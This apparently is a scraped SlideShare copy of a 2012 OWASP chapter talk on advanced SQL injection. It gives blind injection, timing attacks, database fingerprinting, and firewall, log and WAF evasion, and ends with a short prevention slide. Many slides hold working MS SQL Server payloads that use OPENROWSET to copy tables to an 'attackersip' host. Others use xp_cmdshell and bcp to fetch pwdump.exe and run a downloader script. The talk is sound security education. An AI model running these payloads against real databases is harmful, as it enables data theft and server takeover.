SlideShare une entreprise Scribd logo

Owasp Indy Q2 2012 Advanced SQLi

Télécharger en tant que PPTX, PDF
O
owaspindy
Technologie
1  sur  34
Advanced SQLi and Evasion Techniques
About Me Introduction Damian Profancik | Technical Lead/Security Services Leader @ Apparatus, CISSP dprofancik@gmail.com @integrisec
Credit Cesar Cerrudo – CTO, IOActive Labs o http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injecti on.pdf ModSecurity Team – Trustwave SpiderLabs o http://blog.spiderlabs.com/2011/07/modsecurity-sql-injection-challenge-lessons- learned.html Avi Douglen – OWASP Board Member, Israel o http://www.comsecglobal.com/framework/Upload/SQL_Smuggling.pdf
SQL Injection Basics • Dynamic construction of SQL queries “SELECT * FROM table WHERE user = '“ + uname + “' AND pwd = '” + pword + “'” • Unsanitized user input uname = ' or 1=1-- => SELECT * FROM table WHERE user = ' ' or 1=1-- ' AND pwd ='' • Excessive permission o Web services running as privileged user with db_owner rights o Connecting to database using sa, dbo, or sysadmin accounts o Lax file system permissions
Advance SQLi Techniques • Blind SQL Injection • Data Exfiltration • Privilege Escalation • Command Execution • Uploading Files • Internal DB Server Exploration • Port Scanning • Firewall Evasion • Log Evasion • WAF Evasion
Blind SQL Injection
Blind SQL Injection • Differential Analysis Example: http://www.someforum.com/posts.php?id=2 SELECT author, title, body FROM posts WHERE ID = 2 http://www.someforum.com/posts.php?id=2 and 1=2 SELECT author, title, body FROM posts WHERE ID = 2 and 1=2 http://www.someforum.com/posts.php?id=2 and 1=1 SELECT author, title, body FROM posts WHERE ID = 2 and 1=1
Blind SQL Injection (cont.) • Database Management System Fingerprinting o System Functions • MS SQL Server = getdate() • MySQL = now() • Oracle = sysdate() • Example: http://www.someforum.com/posts.php?id=2 and getdate()=getdate() o String Concatenation • MS SQL Server = + • MySQL = +, CONCAT() • Oracle = ||, CONCAT() • Example: http://www.someforum.com/posts.php?id=2 and 'test'='te'+'st' o Query Chaining • MS SQL Server, MySQL = allows chaining with semicolon • Oracle = does NOT allow chaining with semicolon • Example: http://www.someforum.com/posts.php?id=2; commit --
Blind SQL Injection (cont.) • Timing Attacks o Adding delay • SQL Server = WAIT FOR DELAY '0:0:10‘ • MySQL = BENCHMARK(10000000,ENCODE('MSG','by 10 seconds')),null) • PostgreSQL = pg_sleep(10) • Oracle = Union with query that contains a lot of results o SELECT IF(condition, true, false) Example: …1 UNION SELECT IF(SUBSTRING(password,1,1) = CHAR(50),BENCHMARK(10000000,ENCODE('MSG','by 10 seconds')),null) FROM users WHERE userid = 1;
Attacking MS SQL Server
Linked and Remote Servers • OPENROWSET Example: SELECT * FROM OPENROWSET( 'SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;' 'SELECT * FROM table' ) • OPENDATASOURCE Example: SELECT * FROM OPENDATASOURCE( 'SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;' ) .DatabaseName.dbo.TableName
Data Exfiltration • Remote server INSERT Example: INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM table1') SELECT * FROM table2
Data Exfiltration (cont.) INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _sysdatabases') SELECT * FROM master.dbo.sysdatabases INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _sysobjects ') SELECT * FROM databasename.dbo.sysobjects INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _syscolumns') SELECT * FROM databasename.dbo.syscolumns
Data Exfiltration (cont.) INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM table1') SELECT * FROM databasename..table1 INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM table2') SELECT * FROM databasename..table2 INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', ‘SELECT * FROM _sysxlogins') SELECT * FROM databasename.dbo.sysxlogins
Privilege Escalation • Known vulnerabilities Example: SQL injection vulnerability in the RESTORE DATABASE command that can lead to privilege escalation Team SHATTER - 4/12/2012 - http://packetstormsecurity.org/files/111788/shatter-sqlserver.txt • Often not required o Connection strings using SA, dbo, sysadmin o Web service context
Command Execution Example: INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM temp_table') EXEC master.dbo.xp_cmdshell 'dir'
Uploading Files On attacker’s server… 1. CREATE TABLE AttackerTable (data text) 2. BULK INSERT AttackerTable FROM 'pwdump.exe' WITH (codepage='RAW') On victim’s server… 3. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersIP -Usa -Ppwn3d' 4. EXEC xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftMSSQLServerClientConnectTo','AttackersAlias','REG_SZ' ,'DBMSSOCN,AttackersIP,80' 5. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersAlias - Usa -Ppwn3d'
Uploading Files (cont.) INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM temp_table') EXEC xp_cmdshell '"first script line" >> script.vbs' … EXEC xp_cmdshell '"second script line" >> script.vbs' ... EXEC xp_cmdshell '"last script line" >> script.vbs' EXEC xp_cmdshell 'script.vbs' ==> execute script to download binary
Internal DB Server Exploration • Linked and Remote Servers 1. INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _sysservers') SELECT * FROM master.dbo.sysservers 2. INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _sysservers') SELECT * FROM linkedserver1.master.dbo.sysservers 3. INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _sysdatabases') SELECT * FROM linkedserver1.master.dbo.sysdatabases 4. Rinse and repeat…
Port Scanning Example: SELECT * FROM OPENROWSET('SQLOLEDB', 'uid=sa;pwd=;Network=DBMSSOCN;Address=192.168.1.1,80;timeout=5', 'SELECT * FROM table')
Evasion Techniques
Firewall Evasion • Use port 80 for outbound Example: INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,80;', 'SELECT * FROM table1') SELECT * FROM table2
Log Evasion • Inject using POST parameters • Long HTTP requests o IIS truncates requests longer than 4097 characters o Sun-One Application Server truncates at 4092 characters Example: http://www.someforum.com/posts.php?param=<4097 x ‘a’>&id=2 or 1=1--
WAF Evasion • Comments o # = single line comment o -- = single line comment o /* */ = inline, multi-line comment o /*! */ = MySQL-specific inline, multi-line comment Example: http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM… • New line o %0D%0A = URL-encoded newline o %0B = URL-encoded vertical separator Example: http://www.someforum.com/posts.php?id=2 UNION%0D%0ASELECT * FROM…
WAF Evasion (cont.) • Character Encoding o Unicode (U+02BC = ʼ) o CHAR() o Hexadecimal o URL-encoding o Double Encoding Example: Double Encoding: URL = http://www.someforum.com/posts.php?id=2 UN%252f%252a%252a%252fION SEL%252f%252a%252a%252fECT * FROM… WAF = http://www.someforum.com/posts.php?id=2 UN%2f%2a%2a%2fION SEL%2f%2a%252a%2fECT * FROM… Result = http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…
WAF Evasion (cont.) • Concatenation o EXEC() o Split/Join o Special Characters (i.e. ‘*‘, ‘+’, ‘%’, etc.) Example: Split/Join: URL = http://www.someforum.com/posts.php?id=SELECT name&id=password FROM users WAF = id=SELECT name id=password FROM users ASP/ASP.Net = id=SELECT name,password FROM users Special Characters: URL = http://www.someforum.com/posts.php?id=SEL%ECT name,password FR%OM users WAF = id=SEL%ECT name,password FR%OM users ASP/ASP.Net = id=SELECT name,password FROM users
SQL Injection Prevention
SQLi Prevention • Sanitize User Input o Normalize Input o Whitelists o Built-in Functions o Regular Expressions o Trust NO data source (i.e. Cookies, Referer, User-Agent, etc.) • Prepared Statements/Parameterized Queries • Stored Procedures • Accounts with Least Privilege • Enable DisallowAdhocAccess registry setting for MS SQL Server • Perform Self Assessments • Use a Web Application Firewall • Filter Outbound Traffic at Firewall
Q&A

Recommandé

Learning Dtrace
Learning DtraceLearning Dtrace
Learning DtraceJeongHun Byeon
 
Hack ASP.NET website
Hack ASP.NET websiteHack ASP.NET website
Hack ASP.NET websitePositive Hack Days
 
Tugas 2
Tugas 2Tugas 2
Tugas 2Novi_Wahyuni
 
Fia fabila
Fia fabilaFia fabila
Fia fabilafiafabila
 
201913001 khairunnisa progres_harian
201913001 khairunnisa progres_harian201913001 khairunnisa progres_harian
201913001 khairunnisa progres_harianKhairunnisaPekanbaru
 
Build your own private openstack cloud
Build your own private openstack cloudBuild your own private openstack cloud
Build your own private openstack cloudNUTC, imac
 
Java设置环境变量
Java设置环境变量Java设置环境变量
Java设置环境变量Zianed Hou
 
Docker 基本概念與指令操作
Docker 基本概念與指令操作Docker 基本概念與指令操作
Docker 基本概念與指令操作NUTC, imac
 

Recommandé

Learning Dtrace
Learning DtraceLearning Dtrace
Learning DtraceJeongHun Byeon
 
Hack ASP.NET website
Hack ASP.NET websiteHack ASP.NET website
Hack ASP.NET websitePositive Hack Days
 
Tugas 2
Tugas 2Tugas 2
Tugas 2Novi_Wahyuni
 
Fia fabila
Fia fabilaFia fabila
Fia fabilafiafabila
 
201913001 khairunnisa progres_harian
201913001 khairunnisa progres_harian201913001 khairunnisa progres_harian
201913001 khairunnisa progres_harianKhairunnisaPekanbaru
 
Build your own private openstack cloud
Build your own private openstack cloudBuild your own private openstack cloud
Build your own private openstack cloudNUTC, imac
 
Java设置环境变量
Java设置环境变量Java设置环境变量
Java设置环境变量Zianed Hou
 
Docker 基本概念與指令操作
Docker 基本概念與指令操作Docker 基本概念與指令操作
Docker 基本概念與指令操作NUTC, imac
 
使用 CLI 管理 OpenStack 平台
使用 CLI 管理 OpenStack 平台使用 CLI 管理 OpenStack 平台
使用 CLI 管理 OpenStack 平台NUTC, imac
 
07 application security fundamentals - part 2 - security mechanisms - data ...
07 application security fundamentals - part 2 - security mechanisms - data ...07 application security fundamentals - part 2 - security mechanisms - data ...
07 application security fundamentals - part 2 - security mechanisms - data ...appsec
 
DPAPI AND DPAPI-NG: Decryption toolkit. Black Hat 2017
DPAPI AND DPAPI-NG: Decryption toolkit. Black Hat 2017DPAPI AND DPAPI-NG: Decryption toolkit. Black Hat 2017
DPAPI AND DPAPI-NG: Decryption toolkit. Black Hat 2017Paula Januszkiewicz
 
Wwe Management System
Wwe Management SystemWwe Management System
Wwe Management SystemNeerajMudgal1
 
sf bay area dfir meetup (2016-04-30) - OsxCollector
sf bay area dfir meetup (2016-04-30) - OsxCollector sf bay area dfir meetup (2016-04-30) - OsxCollector
sf bay area dfir meetup (2016-04-30) - OsxCollector Rishi Bhargava
 
Black Hat Europe 2017. DPAPI and DPAPI-NG: Decryption Toolkit
Black Hat Europe 2017. DPAPI and DPAPI-NG: Decryption ToolkitBlack Hat Europe 2017. DPAPI and DPAPI-NG: Decryption Toolkit
Black Hat Europe 2017. DPAPI and DPAPI-NG: Decryption ToolkitPaula Januszkiewicz
 
Nko workshop - node js crud & deploy
Nko workshop - node js crud & deployNko workshop - node js crud & deploy
Nko workshop - node js crud & deploySimon Su
 
Secure .NET programming
Secure .NET programmingSecure .NET programming
Secure .NET programmingAnte Gulam
 
Java assgn
Java assgnJava assgn
Java assgnaa11bb11
 
CQURE_BHAsia19_Paula_Januszkiewicz_slides
CQURE_BHAsia19_Paula_Januszkiewicz_slidesCQURE_BHAsia19_Paula_Januszkiewicz_slides
CQURE_BHAsia19_Paula_Januszkiewicz_slidesZuzannaKornecka
 
Flashback (Practical Test)
Flashback (Practical Test)Flashback (Practical Test)
Flashback (Practical Test)Anar Godjaev
 
Maximizing SQL Reviews and Tuning with pt-query-digest
Maximizing SQL Reviews and Tuning with pt-query-digestMaximizing SQL Reviews and Tuning with pt-query-digest
Maximizing SQL Reviews and Tuning with pt-query-digestPythian
 
Noinject
NoinjectNoinject
NoinjectJustin Swanhart
 
Custom faultpolicies
Custom faultpoliciesCustom faultpolicies
Custom faultpoliciesXAVIERCONSULTANTS
 
How to get rid of terraform plan diffs
How to get rid of terraform plan diffsHow to get rid of terraform plan diffs
How to get rid of terraform plan diffsYukiya Hayashi
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure ProgrammingBalavignesh Kasinathan
 
Nantes Jug - Java 7
Nantes Jug - Java 7Nantes Jug - Java 7
Nantes Jug - Java 7Sébastien Prunier
 
Learning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security APILearning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security APIcaswenson
 
Java security
Java securityJava security
Java securityBart Blommaerts
 
Owasp Indy Q2 2012 Cheat Sheet Overview
Owasp Indy Q2 2012 Cheat Sheet OverviewOwasp Indy Q2 2012 Cheat Sheet Overview
Owasp Indy Q2 2012 Cheat Sheet Overviewowaspindy
 
Google Search Cheat Sheet
Google Search Cheat SheetGoogle Search Cheat Sheet
Google Search Cheat SheetTiffany Hamburg Hamburg
 
Regular Expressions cheat-sheet v2
Regular Expressions cheat-sheet v2Regular Expressions cheat-sheet v2
Regular Expressions cheat-sheet v2Mostafa Hashkil
 

Contenu connexe

Tendances

使用 CLI 管理 OpenStack 平台
使用 CLI 管理 OpenStack 平台使用 CLI 管理 OpenStack 平台
使用 CLI 管理 OpenStack 平台NUTC, imac
 
07 application security fundamentals - part 2 - security mechanisms - data ...
07 application security fundamentals - part 2 - security mechanisms - data ...07 application security fundamentals - part 2 - security mechanisms - data ...
07 application security fundamentals - part 2 - security mechanisms - data ...appsec
 
DPAPI AND DPAPI-NG: Decryption toolkit. Black Hat 2017
DPAPI AND DPAPI-NG: Decryption toolkit. Black Hat 2017DPAPI AND DPAPI-NG: Decryption toolkit. Black Hat 2017
DPAPI AND DPAPI-NG: Decryption toolkit. Black Hat 2017Paula Januszkiewicz
 
Wwe Management System
Wwe Management SystemWwe Management System
Wwe Management SystemNeerajMudgal1
 
sf bay area dfir meetup (2016-04-30) - OsxCollector
sf bay area dfir meetup (2016-04-30) - OsxCollector sf bay area dfir meetup (2016-04-30) - OsxCollector
sf bay area dfir meetup (2016-04-30) - OsxCollector Rishi Bhargava
 
Black Hat Europe 2017. DPAPI and DPAPI-NG: Decryption Toolkit
Black Hat Europe 2017. DPAPI and DPAPI-NG: Decryption ToolkitBlack Hat Europe 2017. DPAPI and DPAPI-NG: Decryption Toolkit
Black Hat Europe 2017. DPAPI and DPAPI-NG: Decryption ToolkitPaula Januszkiewicz
 
Nko workshop - node js crud & deploy
Nko workshop - node js crud & deployNko workshop - node js crud & deploy
Nko workshop - node js crud & deploySimon Su
 
Secure .NET programming
Secure .NET programmingSecure .NET programming
Secure .NET programmingAnte Gulam
 
Java assgn
Java assgnJava assgn
Java assgnaa11bb11
 
CQURE_BHAsia19_Paula_Januszkiewicz_slides
CQURE_BHAsia19_Paula_Januszkiewicz_slidesCQURE_BHAsia19_Paula_Januszkiewicz_slides
CQURE_BHAsia19_Paula_Januszkiewicz_slidesZuzannaKornecka
 
Flashback (Practical Test)
Flashback (Practical Test)Flashback (Practical Test)
Flashback (Practical Test)Anar Godjaev
 
Maximizing SQL Reviews and Tuning with pt-query-digest
Maximizing SQL Reviews and Tuning with pt-query-digestMaximizing SQL Reviews and Tuning with pt-query-digest
Maximizing SQL Reviews and Tuning with pt-query-digestPythian
 
How to get rid of terraform plan diffs
How to get rid of terraform plan diffsHow to get rid of terraform plan diffs
How to get rid of terraform plan diffsYukiya Hayashi
 
Learning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security APILearning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security APIcaswenson
 

Tendances (19)

使用 CLI 管理 OpenStack 平台
使用 CLI 管理 OpenStack 平台使用 CLI 管理 OpenStack 平台
使用 CLI 管理 OpenStack 平台
 
07 application security fundamentals - part 2 - security mechanisms - data ...
07 application security fundamentals - part 2 - security mechanisms - data ...07 application security fundamentals - part 2 - security mechanisms - data ...
07 application security fundamentals - part 2 - security mechanisms - data ...
 
DPAPI AND DPAPI-NG: Decryption toolkit. Black Hat 2017
DPAPI AND DPAPI-NG: Decryption toolkit. Black Hat 2017DPAPI AND DPAPI-NG: Decryption toolkit. Black Hat 2017
DPAPI AND DPAPI-NG: Decryption toolkit. Black Hat 2017
 
Wwe Management System
Wwe Management SystemWwe Management System
Wwe Management System
 
sf bay area dfir meetup (2016-04-30) - OsxCollector
sf bay area dfir meetup (2016-04-30) - OsxCollector sf bay area dfir meetup (2016-04-30) - OsxCollector
sf bay area dfir meetup (2016-04-30) - OsxCollector
 
Black Hat Europe 2017. DPAPI and DPAPI-NG: Decryption Toolkit
Black Hat Europe 2017. DPAPI and DPAPI-NG: Decryption ToolkitBlack Hat Europe 2017. DPAPI and DPAPI-NG: Decryption Toolkit
Black Hat Europe 2017. DPAPI and DPAPI-NG: Decryption Toolkit
 
Nko workshop - node js crud & deploy
Nko workshop - node js crud & deployNko workshop - node js crud & deploy
Nko workshop - node js crud & deploy
 
Secure .NET programming
Secure .NET programmingSecure .NET programming
Secure .NET programming
 
Java assgn
Java assgnJava assgn
Java assgn
 
CQURE_BHAsia19_Paula_Januszkiewicz_slides
CQURE_BHAsia19_Paula_Januszkiewicz_slidesCQURE_BHAsia19_Paula_Januszkiewicz_slides
CQURE_BHAsia19_Paula_Januszkiewicz_slides
 
Flashback (Practical Test)
Flashback (Practical Test)Flashback (Practical Test)
Flashback (Practical Test)
 
Maximizing SQL Reviews and Tuning with pt-query-digest
Maximizing SQL Reviews and Tuning with pt-query-digestMaximizing SQL Reviews and Tuning with pt-query-digest
Maximizing SQL Reviews and Tuning with pt-query-digest
 
Noinject
NoinjectNoinject
Noinject
 
Custom faultpolicies
Custom faultpoliciesCustom faultpolicies
Custom faultpolicies
 
How to get rid of terraform plan diffs
How to get rid of terraform plan diffsHow to get rid of terraform plan diffs
How to get rid of terraform plan diffs
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
Nantes Jug - Java 7
Nantes Jug - Java 7Nantes Jug - Java 7
Nantes Jug - Java 7
 
Learning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security APILearning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security API
 
Java security
Java securityJava security
Java security
 

En vedette

Owasp Indy Q2 2012 Cheat Sheet Overview
Owasp Indy Q2 2012 Cheat Sheet OverviewOwasp Indy Q2 2012 Cheat Sheet Overview
Owasp Indy Q2 2012 Cheat Sheet Overviewowaspindy
 
Regular Expressions cheat-sheet v2
Regular Expressions cheat-sheet v2Regular Expressions cheat-sheet v2
Regular Expressions cheat-sheet v2Mostafa Hashkil
 
Memory forensics cheat sheet
Memory forensics cheat sheetMemory forensics cheat sheet
Memory forensics cheat sheetMartin Cabrera
 
Business analyst titles, knowledge and tasks
Business analyst titles, knowledge and tasksBusiness analyst titles, knowledge and tasks
Business analyst titles, knowledge and tasksMostafa Hashkil
 
Introduction to Programming with C# Book - книга за C# програмиране
Introduction to Programming with C# Book - книга за C# програмиранеIntroduction to Programming with C# Book - книга за C# програмиране
Introduction to Programming with C# Book - книга за C# програмиранеIntro C# Book
 
Vi Cheat Sheet v 1 00
Vi Cheat Sheet v 1 00Vi Cheat Sheet v 1 00
Vi Cheat Sheet v 1 00Nicole Cordes
 
Linux Bash Shell Cheat Sheet for Beginners
Linux Bash Shell Cheat Sheet for BeginnersLinux Bash Shell Cheat Sheet for Beginners
Linux Bash Shell Cheat Sheet for BeginnersDavide Ciambelli
 
Unix Command-Line Cheat Sheet BTI2014
Unix Command-Line Cheat Sheet BTI2014Unix Command-Line Cheat Sheet BTI2014
Unix Command-Line Cheat Sheet BTI2014Noé Fernández-Pozo
 
REST HTTP Response Codes Cheat Sheet
REST HTTP Response Codes Cheat SheetREST HTTP Response Codes Cheat Sheet
REST HTTP Response Codes Cheat SheetMarkus Tacker
 
Social Platform Cheat Sheet
Social Platform Cheat SheetSocial Platform Cheat Sheet
Social Platform Cheat Sheet360i
 
Python Cheat Sheet
Python Cheat SheetPython Cheat Sheet
Python Cheat SheetGlowTouch
 
Designers Cheat Sheet Illustrated 03
Designers Cheat Sheet Illustrated 03Designers Cheat Sheet Illustrated 03
Designers Cheat Sheet Illustrated 03JABVAB
 
Effective 15-minute presentations - Cheat Sheet
Effective 15-minute presentations - Cheat SheetEffective 15-minute presentations - Cheat Sheet
Effective 15-minute presentations - Cheat SheetJan Schrage
 
Problems with parameters b sides-msp
Problems with parameters b sides-mspProblems with parameters b sides-msp
Problems with parameters b sides-mspMike Saunders
 
Principles of microservices velocity
Principles of microservices velocityPrinciples of microservices velocity
Principles of microservices velocitySam Newman
 

En vedette (20)

Owasp Indy Q2 2012 Cheat Sheet Overview
Owasp Indy Q2 2012 Cheat Sheet OverviewOwasp Indy Q2 2012 Cheat Sheet Overview
Owasp Indy Q2 2012 Cheat Sheet Overview
 
Google Search Cheat Sheet
Google Search Cheat SheetGoogle Search Cheat Sheet
Google Search Cheat Sheet
 
Regular Expressions cheat-sheet v2
Regular Expressions cheat-sheet v2Regular Expressions cheat-sheet v2
Regular Expressions cheat-sheet v2
 
Memory forensics cheat sheet
Memory forensics cheat sheetMemory forensics cheat sheet
Memory forensics cheat sheet
 
Business analyst titles, knowledge and tasks
Business analyst titles, knowledge and tasksBusiness analyst titles, knowledge and tasks
Business analyst titles, knowledge and tasks
 
Introduction to Programming with C# Book - книга за C# програмиране
Introduction to Programming with C# Book - книга за C# програмиранеIntroduction to Programming with C# Book - книга за C# програмиране
Introduction to Programming with C# Book - книга за C# програмиране
 
Vi Cheat Sheet v 1 00
Vi Cheat Sheet v 1 00Vi Cheat Sheet v 1 00
Vi Cheat Sheet v 1 00
 
Linux Bash Shell Cheat Sheet for Beginners
Linux Bash Shell Cheat Sheet for BeginnersLinux Bash Shell Cheat Sheet for Beginners
Linux Bash Shell Cheat Sheet for Beginners
 
Unix Command-Line Cheat Sheet BTI2014
Unix Command-Line Cheat Sheet BTI2014Unix Command-Line Cheat Sheet BTI2014
Unix Command-Line Cheat Sheet BTI2014
 
Linux cheat-sheet
Linux cheat-sheetLinux cheat-sheet
Linux cheat-sheet
 
Rework cheat sheet
Rework cheat sheetRework cheat sheet
Rework cheat sheet
 
REST HTTP Response Codes Cheat Sheet
REST HTTP Response Codes Cheat SheetREST HTTP Response Codes Cheat Sheet
REST HTTP Response Codes Cheat Sheet
 
Social Platform Cheat Sheet
Social Platform Cheat SheetSocial Platform Cheat Sheet
Social Platform Cheat Sheet
 
Python Cheat Sheet
Python Cheat SheetPython Cheat Sheet
Python Cheat Sheet
 
Scrum Cheat Sheet
Scrum Cheat SheetScrum Cheat Sheet
Scrum Cheat Sheet
 
Designers Cheat Sheet Illustrated 03
Designers Cheat Sheet Illustrated 03Designers Cheat Sheet Illustrated 03
Designers Cheat Sheet Illustrated 03
 
Composting
CompostingComposting
Composting
 
Effective 15-minute presentations - Cheat Sheet
Effective 15-minute presentations - Cheat SheetEffective 15-minute presentations - Cheat Sheet
Effective 15-minute presentations - Cheat Sheet
 
Problems with parameters b sides-msp
Problems with parameters b sides-mspProblems with parameters b sides-msp
Problems with parameters b sides-msp
 
Principles of microservices velocity
Principles of microservices velocityPrinciples of microservices velocity
Principles of microservices velocity
 

Similaire à Owasp Indy Q2 2012 Advanced SQLi

SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
Php Security - OWASP
Php Security - OWASPPhp Security - OWASP
Php Security - OWASPMizno Kruge
 
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormDefcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormguest785f78
 
MySQL server security
MySQL server securityMySQL server security
MySQL server securityDamien Seguy
 
03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17Eoin Keary
 
Hack your db before the hackers do
Hack your db before the hackers doHack your db before the hackers do
Hack your db before the hackers dofangjiafu
 
Hacking Your Way To Better Security - php[tek] 2016
Hacking Your Way To Better Security - php[tek] 2016Hacking Your Way To Better Security - php[tek] 2016
Hacking Your Way To Better Security - php[tek] 2016Colin O'Dell
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Securityjemond
 
OWASP San Diego Training Presentation
OWASP San Diego Training PresentationOWASP San Diego Training Presentation
OWASP San Diego Training Presentationowaspsd
 
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IAS
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IASEnable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IAS
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IASInvenire Aude
 

Similaire à Owasp Indy Q2 2012 Advanced SQLi (20)

SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
 
Php Security - OWASP
Php Security - OWASPPhp Security - OWASP
Php Security - OWASP
 
Database security
Database securityDatabase security
Database security
 
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormDefcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
 
MySQL server security
MySQL server securityMySQL server security
MySQL server security
 
3 database-jdbc(1)
3 database-jdbc(1)3 database-jdbc(1)
3 database-jdbc(1)
 
03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17
 
Hack your db before the hackers do
Hack your db before the hackers doHack your db before the hackers do
Hack your db before the hackers do
 
Hacking Your Way To Better Security - php[tek] 2016
Hacking Your Way To Better Security - php[tek] 2016Hacking Your Way To Better Security - php[tek] 2016
Hacking Your Way To Better Security - php[tek] 2016
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Security
 
Sql Injection V.2
Sql Injection V.2Sql Injection V.2
Sql Injection V.2
 
JDBC Tutorial
JDBC TutorialJDBC Tutorial
JDBC Tutorial
 
OWASP San Diego Training Presentation
OWASP San Diego Training PresentationOWASP San Diego Training Presentation
OWASP San Diego Training Presentation
 
Raj mysql
Raj mysqlRaj mysql
Raj mysql
 
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IAS
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IASEnable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IAS
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IAS
 
Lecture17
Lecture17Lecture17
Lecture17
 
Jdbc ppt
Jdbc pptJdbc ppt
Jdbc ppt
 
Python with MySql.pptx
Python with MySql.pptxPython with MySql.pptx
Python with MySql.pptx
 
Sql injection
Sql injectionSql injection
Sql injection
 
Operation outbreak
Operation outbreakOperation outbreak
Operation outbreak
 

Dernier

From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
